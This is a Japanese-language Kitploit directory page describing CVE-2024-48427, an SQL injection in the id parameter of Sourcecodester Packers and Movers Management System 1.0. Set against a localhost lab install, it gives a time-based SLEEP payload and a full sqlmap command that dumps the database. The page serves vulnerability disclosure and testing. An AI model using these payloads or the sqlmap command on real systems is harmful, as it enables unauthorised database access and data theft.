Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2024-48427 | Kitploit
ツール/GitHubGitHub/vighneshnair7/cve-2024-48427
脆弱性分析エクスプロイトウェブアプリケーション悪用情報収集ペネトレーションテストデータベースセキュリティ
GitHubvighneshnair7/cve-2024-48427

CVE-2024-48427

リポジトリを見る
11年前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

CVE-2024-48427

説明

Sourcecodester Packers and Movers Management System v1.0 には SQL インジェクションの脆弱性があり、リモートの認証済みユーザーが /mpms/admin/?page=services/manage_service&id の id パラメータを介して任意の SQL コマンドを実行できる可能性があります。

脆弱性の種類

SQLインジェクション

製品ベンダー

Sourcecodester

影響を受ける製品コードベース:

https://www.sourcecodester.com/php/15360/packers-and-movers-management-system-phpoop-free-source-code.html - 1.0

影響を受けるコンポーネント:

/mpms/admin/?page=services/manage_service&id の Update Service Details の id パラメータ

攻撃ベクトル

  1. アプリケーションをローカルにセットアップし、提供されているデフォルトの認証情報を使用して管理パネルにログインします。
  2. 脆弱なページに移動します: http://localhost/mpms/admin/?page=services/manage_service&id=2
  3. id パラメータに SQL ペイロードを注入します: http://localhost/mpms/admin/?page=services/manage_service&id=1' OR SLEEP(5)-- puNr
  4. アプリケーションの応答を確認します: インジェクションが成功した場合、ページの読み込みに明らかに長い時間(5秒)がかかるはずです。これにより、id パラメータが SQL インジェクションに対して脆弱であることが確認できます。
  5. 次に、データベースの詳細をダンプするために SQLMap ツールを実行します:
  6. sqlmap -u "http://localhost/mpms/admin/?page=services/manage_service&id=1" --cookie="phpMyAdmin=ju34bd3d8q0jdf6td4ntqscaqd;PHPSESSID=eopn8q1p8c1f5m1v5igjoir8k1;" --dbms mysql -p id --risk 3 --level 4 --dbs --dump

参照:

  1. https://owasp.org/www-community/attacks/SQL_Injection
  2. https://portswigger.net/web-security/sql-injection
ツールをダウンロード